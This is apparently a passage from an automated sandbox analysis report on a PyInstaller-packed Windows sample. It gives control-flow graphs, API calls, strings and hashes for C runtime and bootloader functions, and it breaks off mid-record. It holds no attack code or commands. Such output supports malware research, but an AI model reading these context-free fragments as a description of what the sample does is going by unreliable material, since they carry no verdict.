                                                                                          • ___raise_securityfailure.LIBCMT ref: 003814CD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                          • String ID: 8]<
                                                                                          • API String ID: 3761405300-4114821796
                                                                                          • Opcode ID: f085c287b9439c6e82aaf8bafe08b1245a7e80b8bcd098514e3ff608b36a4534
                                                                                          • Instruction ID: 24eab6cd7186e0eb3d34a0ce651558cdb4a2bca77c0b37c5f15425218c23845d
                                                                                          • Opcode Fuzzy Hash: f085c287b9439c6e82aaf8bafe08b1245a7e80b8bcd098514e3ff608b36a4534
                                                                                          • Instruction Fuzzy Hash: 6211C0B5511B04DBC712DF25E889A857BBDBB28301F00502AE809CB3A1E3B1BAC18F45
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,003731E7,?,?,0037325F,?,?,?,?,?,00373249), ref: 003730D0
                                                                                          • GetLastError.KERNEL32(?,?,0037325F,?,?,?,?,?,00373249), ref: 003730DC
                                                                                            • Part of subcall function 00367BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00367BD5
                                                                                          Strings
                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 003730E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                          • API String ID: 1091760877-2248577382
                                                                                          • Opcode ID: 0a2d2345a8b76feb2d4dd66e66db7b9973e642b0fc328b3b989581bcb12b19b7
                                                                                          • Instruction ID: 0472d178a25ff30daef0d20c29541017b5b153a4fd0a3b26d4d6b0524895803b
                                                                                          • Opcode Fuzzy Hash: 0a2d2345a8b76feb2d4dd66e66db7b9973e642b0fc328b3b989581bcb12b19b7
                                                                                          • Instruction Fuzzy Hash: 13D05E3250D53437DA1333246C0BDAE3D09DB62335FA18755F5396A2E9CA614D5182D1
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,0036F951,?), ref: 003701FF
                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0036F951,?), ref: 0037020D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindHandleModuleResource
                                                                                          • String ID: RTL
                                                                                          • API String ID: 3537982541-834975271
                                                                                          • Opcode ID: 114977dc2fba3f67c6c5e317b5e0269e38d54cfdf83ba9737bd9ab5f3d05ecd2
                                                                                          • Instruction ID: a9b6a4af5f3424532278095cca029c313517dd8da83bfe6b1c3e1f32ead78651
                                                                                          • Opcode Fuzzy Hash: 114977dc2fba3f67c6c5e317b5e0269e38d54cfdf83ba9737bd9ab5f3d05ecd2
                                                                                          • Instruction Fuzzy Hash: 40C0123128575096DA3257716C4FB832E586B00711F051449F545DA2C1D6E7C8418660

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 111 7ff647796470-7ff6477964ab call 7ff647795df8 call 7ff647795e00 call 7ff647795e68 118 7ff6477964b1-7ff6477964bc call 7ff647795e08 111->118 119 7ff6477966d5-7ff647796721 call 7ff64778afc4 call 7ff647795df8 call 7ff647795e00 call 7ff647795e68 111->119 118->119 125 7ff6477964c2-7ff6477964cc 118->125 146 7ff64779685f-7ff6477968cd call 7ff64778afc4 call 7ff647791ce8 119->146 147 7ff647796727-7ff647796732 call 7ff647795e08 119->147 127 7ff6477964ee-7ff6477964f2 125->127 128 7ff6477964ce-7ff6477964d1 125->128 129 7ff6477964f5-7ff6477964fd 127->129 131 7ff6477964d4-7ff6477964df 128->131 129->129 132 7ff6477964ff-7ff647796512 call 7ff64778dcbc 129->132 134 7ff6477964e1-7ff6477964e8 131->134 135 7ff6477964ea-7ff6477964ec 131->135 141 7ff647796514-7ff647796516 call 7ff64778b00c 132->141 142 7ff64779652a-7ff647796536 call 7ff64778b00c 132->142 134->131 134->135 135->127 136 7ff64779651b-7ff647796529 135->136 141->136 153 7ff64779653d-7ff647796545 142->153 164 7ff6477968cf-7ff6477968d6 146->164 165 7ff6477968db-7ff6477968de 146->165 147->146 154 7ff647796738-7ff647796743 call 7ff647795e38 147->154 153->153 156 7ff647796547-7ff647796558 call 7ff647790f54 153->156 154->146 163 7ff647796749-7ff64779676c call 7ff64778b00c GetTimeZoneInformation 154->163 156->119 166 7ff64779655e-7ff6477965b4 call 7ff64777d1e0 * 4 call 7ff64779638c 156->166 179 7ff647796772-7ff647796793 163->179 180 7ff647796834-7ff64779685e call 7ff647795df0 call 7ff647795de0 call 7ff647795de8 163->180 169 7ff64779696b-7ff64779696e 164->169 170 7ff6477968e0 165->170 171 7ff647796915-7ff647796928 call 7ff64778dcbc 165->171 224 7ff6477965b6-7ff6477965ba 166->224 173 7ff6477968e3 call 7ff6477966ec 169->173 174 7ff647796974-7ff64779697c call 7ff647796470 169->174 170->173 188 7ff647796933-7ff64779694e call 7ff647791ce8 171->188 189 7ff64779692a 171->189 183 7ff6477968e8-7ff647796914 call 7ff64778b00c call 7ff64777bdc0 173->183 174->183 186 7ff64779679e-7ff6477967a5 179->186 187 7ff647796795-7ff64779679b 179->187 194 7ff6477967a7-7ff6477967af 186->194 195 7ff6477967b9 186->195 187->186 210 7ff647796950-7ff647796953 188->210 211 7ff647796955-7ff647796967 call 7ff64778b00c 188->211 193 7ff64779692c-7ff647796931 call 7ff64778b00c 189->193 193->170 194->195 202 7ff6477967b1-7ff6477967b7 194->202 200 7ff6477967bb-7ff64779682f call 7ff64777d1e0 * 4 call 7ff6477932cc call 7ff647796984 * 2 195->200 200->180 202->200 210->193 211->169 226 7ff6477965c0-7ff6477965c4 224->226 227 7ff6477965bc 224->227 226->224 229 7ff6477965c6-7ff6477965eb call 7ff64778716c 226->229 227->226 234 7ff6477965ee-7ff6477965f2 229->234 236 7ff647796601-7ff647796605 234->236 237 7ff6477965f4-7ff6477965ff 234->237 236->234 237->236 239 7ff647796607-7ff64779660b 237->239 241 7ff64779668c-7ff647796690 239->241 242 7ff64779660d-7ff647796635 call 7ff64778716c 239->242 244 7ff647796692-7ff647796694 241->244 245 7ff647796697-7ff6477966a4 241->245 251 7ff647796653-7ff647796657 242->251 252 7ff647796637 242->252 244->245 247 7ff6477966bf-7ff6477966ce call 7ff647795df0 call 7ff647795de0 245->247 248 7ff6477966a6-7ff6477966bc call 7ff64779638c 245->248 247->119 248->247 251->241 257 7ff647796659-7ff647796677 call 7ff64778716c 251->257 255 7ff64779663a-7ff647796641 252->255 255->251 258 7ff647796643-7ff647796651 255->258 263 7ff647796683-7ff64779668a 257->263 258->251 258->255 263->241 264 7ff647796679-7ff64779667d 263->264 264->241 265 7ff64779667f 264->265 265->263
                                                                                          APIs
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6477964B5
                                                                                            • Part of subcall function 00007FF647795E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E1C
                                                                                            • Part of subcall function 00007FF64778B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
                                                                                            • Part of subcall function 00007FF64778B00C: GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C
                                                                                            • Part of subcall function 00007FF64778AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF64778AFA3,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778AFCD
                                                                                            • Part of subcall function 00007FF64778AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64778AFA3,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778AFF2
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6477964A4
                                                                                            • Part of subcall function 00007FF647795E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E7C
                                                                                          • _get_daylight.LIBCMT ref: 00007FF64779671A
                                                                                          • _get_daylight.LIBCMT ref: 00007FF64779672B
                                                                                          • _get_daylight.LIBCMT ref: 00007FF64779673C
                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64779697C), ref: 00007FF647796763
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                          • API String ID: 3714727158-239921721
                                                                                          • Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                                          • Instruction ID: ea788e05cfad9ecb2c19039072f8ed066732795e1d066173453ce76e43e4665d
                                                                                          • Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                                          • Instruction Fuzzy Hash: D0D1C0A2A0D252C6F720BF32D8915B96761EF64B98FC18236EE0DC7695DE3CE441C348

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 444 7ff6477973bc-7ff64779742f call 7ff6477970f0 447 7ff647797431-7ff64779743a call 7ff6477855a4 444->447 448 7ff647797449-7ff647797453 call 7ff647788534 444->448 453 7ff64779743d-7ff647797444 call 7ff6477855c4 447->453 454 7ff64779746e-7ff6477974d7 CreateFileW 448->454 455 7ff647797455-7ff64779746c call 7ff6477855a4 call 7ff6477855c4 448->455 468 7ff64779778a-7ff6477977aa 453->468 456 7ff647797554-7ff64779755f GetFileType 454->456 457 7ff6477974d9-7ff6477974df 454->457 455->453 463 7ff647797561-7ff64779759c GetLastError call 7ff647785538 CloseHandle 456->463 464 7ff6477975b2-7ff6477975b9 456->464 460 7ff647797521-7ff64779754f GetLastError call 7ff647785538 457->460 461 7ff6477974e1-7ff6477974e5 457->461 460->453 461->460 466 7ff6477974e7-7ff64779751f CreateFileW 461->466 463->453 479 7ff6477975a2-7ff6477975ad call 7ff6477855c4 463->479 471 7ff6477975c1-7ff6477975c4 464->471 472 7ff6477975bb-7ff6477975bf 464->472 466->456 466->460 473 7ff6477975c6 471->473 474 7ff6477975ca-7ff64779761f call 7ff64778844c 471->474 472->474 473->474 482 7ff64779763e-7ff64779766f call 7ff647796e70 474->482 483 7ff647797621-7ff64779762d call 7ff6477972f8 474->483 479->453 490 7ff647797671-7ff647797673 482->490 491 7ff647797675-7ff6477976b7 482->491 483->482 489 7ff64779762f 483->489 494 7ff647797631-7ff647797639 call 7ff64778b184 489->494 490->494 492 7ff6477976d9-7ff6477976e4 491->492 493 7ff6477976b9-7ff6477976bd 491->493 496 7ff647797788 492->496 497 7ff6477976ea-7ff6477976ee 492->497 493->492 495 7ff6477976bf-7ff6477976d4 493->495 494->468 495->492 496->468 497->496 499 7ff6477976f4-7ff647797739 CloseHandle CreateFileW 497->499 501 7ff64779776e-7ff647797783 499->501 502 7ff64779773b-7ff647797769 GetLastError call 7ff647785538 call 7ff647788674 499->502 501->496 502->501
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                          • String ID:
                                                                                          • API String ID: 1617910340-0
                                                                                          • Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                          • Instruction ID: 185680227e5c2950c75ab5d0b210747a67d5174e573ff7ed3070abf9c47ce1a7
                                                                                          • Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                          • Instruction Fuzzy Hash: 95C1C076B29A42C5FB50EFA8C4806AC3765FB59BA8B810225DE1E9B3E5CF38D451C344

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF64777154F), ref: 00007FF6477779F7
                                                                                            • Part of subcall function 00007FF647777B70: GetEnvironmentVariableW.KERNEL32(00007FF647773A1F), ref: 00007FF647777BAA
                                                                                            • Part of subcall function 00007FF647777B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF647777BC7
                                                                                            • Part of subcall function 00007FF647787EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647787F05
                                                                                          • SetEnvironmentVariableW.KERNEL32 ref: 00007FF647777AB1
                                                                                            • Part of subcall function 00007FF647772B30: MessageBoxW.USER32 ref: 00007FF647772C05
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                          • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                          • API String ID: 3752271684-1116378104
                                                                                          • Opcode ID: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
                                                                                          • Instruction ID: 579c13fbcbc25f6f8de22b7bf75346f22668a9db712f623b6daf1ddd1a4613b4
                                                                                          • Opcode Fuzzy Hash: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
                                                                                          • Instruction Fuzzy Hash: F9518051B0D653C1FE54B736A9222BA5345AF9ABC0FC54431ED0ECB7A7ED2DF5018288

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 777 7ff6477966ec-7ff647796721 call 7ff647795df8 call 7ff647795e00 call 7ff647795e68 784 7ff64779685f-7ff6477968cd call 7ff64778afc4 call 7ff647791ce8 777->784 785 7ff647796727-7ff647796732 call 7ff647795e08 777->785 797 7ff6477968cf-7ff6477968d6 784->797 798 7ff6477968db-7ff6477968de 784->798 785->784 790 7ff647796738-7ff647796743 call 7ff647795e38 785->790 790->784 796 7ff647796749-7ff64779676c call 7ff64778b00c GetTimeZoneInformation 790->796 808 7ff647796772-7ff647796793 796->808 809 7ff647796834-7ff64779685e call 7ff647795df0 call 7ff647795de0 call 7ff647795de8 796->809 800 7ff64779696b-7ff64779696e 797->800 801 7ff6477968e0 798->801 802 7ff647796915-7ff647796928 call 7ff64778dcbc 798->802 803 7ff6477968e3 call 7ff6477966ec 800->803 804 7ff647796974-7ff64779697c call 7ff647796470 800->804 801->803 816 7ff647796933-7ff64779694e call 7ff647791ce8 802->816 817 7ff64779692a 802->817 812 7ff6477968e8-7ff647796914 call 7ff64778b00c call 7ff64777bdc0 803->812 804->812 814 7ff64779679e-7ff6477967a5 808->814 815 7ff647796795-7ff64779679b 808->815 821 7ff6477967a7-7ff6477967af 814->821 822 7ff6477967b9 814->822 815->814 835 7ff647796950-7ff647796953 816->835 836 7ff647796955-7ff647796967 call 7ff64778b00c 816->836 820 7ff64779692c-7ff647796931 call 7ff64778b00c 817->820 820->801 821->822 828 7ff6477967b1-7ff6477967b7 821->828 826 7ff6477967bb-7ff64779682f call 7ff64777d1e0 * 4 call 7ff6477932cc call 7ff647796984 * 2 822->826 826->809 828->826 835->820 836->800
                                                                                          APIs
                                                                                          • _get_daylight.LIBCMT ref: 00007FF64779671A
                                                                                            • Part of subcall function 00007FF647795E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E7C
                                                                                          • _get_daylight.LIBCMT ref: 00007FF64779672B
                                                                                            • Part of subcall function 00007FF647795E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E1C
                                                                                          • _get_daylight.LIBCMT ref: 00007FF64779673C
                                                                                            • Part of subcall function 00007FF647795E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E4C
                                                                                            • Part of subcall function 00007FF64778B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
                                                                                            • Part of subcall function 00007FF64778B00C: GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C
                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64779697C), ref: 00007FF647796763
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                          • API String ID: 1511944507-239921721
                                                                                          • Opcode ID: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
                                                                                          • Instruction ID: 2a13e88c432f7eae16cd91a5953f09ad02ec1ffae5113d119f895221f7ff19bf
                                                                                          • Opcode Fuzzy Hash: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
                                                                                          • Instruction Fuzzy Hash: 06513972A1D652C6F720FF21E8915B96760BB58784F80423AEE4DC769ADF3CE4408748
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 1010374628-0
                                                                                          • Opcode ID: bc45aae4033a50195dd8df506693c608275109d72699b5b2474aa85e53b6b0b5
                                                                                          • Instruction ID: b93c41161b188cf573c30b0481d11d01e27e819116108e0cf44b618725a141ee
                                                                                          • Opcode Fuzzy Hash: bc45aae4033a50195dd8df506693c608275109d72699b5b2474aa85e53b6b0b5
                                                                                          • Instruction Fuzzy Hash: 1502D1A1F0E646C0FA65FB2594002792690AF55BE0FD98A35DD6DC67E2EE3CF421830C

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ff647771710-7ff647771724 1 7ff647771726-7ff64777173d call 7ff647772b30 0->1 2 7ff64777173e-7ff647771742 0->2 4 7ff647771768-7ff64777178b call 7ff647777c20 2->4 5 7ff647771744-7ff64777174d call 7ff6477712b0 2->5 13 7ff64777178d-7ff6477717b8 call 7ff647772890 4->13 14 7ff6477717b9-7ff6477717d4 call 7ff647773fe0 4->14 11 7ff64777175f-7ff647771767 5->11 12 7ff64777174f-7ff64777175a call 7ff647772b30 5->12 12->11 20 7ff6477717d6-7ff6477717e9 call 7ff647772b30 14->20 21 7ff6477717ee-7ff647771801 call 7ff647780914 14->21 26 7ff64777192f-7ff647771932 call 7ff64778028c 20->26 27 7ff647771823-7ff647771827 21->27 28 7ff647771803-7ff64777181e call 7ff647772890 21->28 35 7ff647771937-7ff64777194e 26->35 31 7ff647771829-7ff647771835 call 7ff647771050 27->31 32 7ff647771841-7ff647771861 call 7ff647785090 27->32 39 7ff647771927-7ff64777192a call 7ff64778028c 28->39 37 7ff64777183a-7ff64777183c 31->37 40 7ff647771882-7ff647771888 32->40 41 7ff647771863-7ff64777187d call 7ff647772890 32->41 37->39 39->26 44 7ff647771915-7ff647771918 call 7ff64778507c 40->44 45 7ff64777188e-7ff647771897 40->45 49 7ff64777191d-7ff647771922 41->49 44->49 48 7ff6477718a0-7ff6477718c2 call 7ff6477805dc 45->48 52 7ff6477718c4-7ff6477718dc call 7ff647780d1c 48->52 53 7ff6477718f5-7ff6477718fc 48->53 49->39 59 7ff6477718e5-7ff6477718f3 52->59 60 7ff6477718de-7ff6477718e1 52->60 54 7ff647771903-7ff64777190b call 7ff647772890 53->54 62 7ff647771910 54->62 59->54 60->48 61 7ff6477718e3 60->61 61->62 62->44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                          • API String ID: 2030045667-3833288071
                                                                                          • Opcode ID: 5255ee959a8f60209247e1ad93f54e2cb4c33fe61b594c51680441b7833373f6
                                                                                          • Instruction ID: 80913753336d13212eb32b0904eb22a07f0eead83a4d75c30012a4e374377654
                                                                                          • Opcode Fuzzy Hash: 5255ee959a8f60209247e1ad93f54e2cb4c33fe61b594c51680441b7833373f6
                                                                                          • Instruction Fuzzy Hash: F651BAA1B0D682C6FA10BB25E8506B963A1FF95BD4FC00531DE1C876A6EE3CF645C708

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
